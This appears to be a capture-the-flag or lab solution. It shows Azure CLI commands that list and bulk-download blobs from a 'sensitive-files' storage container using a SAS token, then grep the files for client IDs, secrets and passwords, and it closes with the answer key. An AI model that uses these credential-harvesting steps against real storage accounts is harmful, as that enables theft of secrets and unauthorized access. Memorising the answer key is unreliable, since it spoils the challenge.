The answer is the clientId, appId, or applicationId value inside the credential file downloaded from the sensitive-files container.
Detailed Solution:
List blobs inside the accessible container:
az storage blob list \
--account-name excaliburstore \
--container-name sensitive-files \
--sas-token " $SAS " \
--query " [].name " \
--output table
Download all files locally:
mkdir blobloot
az storage blob download-batch \
--account-name excaliburstore \
--source sensitive-files \
--destination blobloot \
--sas-token " $SAS "
Search the downloaded files for application credentials:
grep -RniE " clientId|appId|applicationId|clientSecret|tenantId|secret|password " blobloot
On Windows PowerShell:
Select-String -Path .\blobloot\* -Pattern " clientId|appId|applicationId|clientSecret|tenantId|secret|password " -CaseSensitive:$false
A typical file may look like this:
{
" tenantId " : " f015f36d-c07f-41fb-9bde-fffc3a22ee8b " ,
" clientId " : " < application-client-id > " ,
" clientSecret " : " < application-client-secret > "
}
The clientId / appId value is the answer.
Final Answer:
Use the clientId / appId value found in the blob credential file.
================
Submit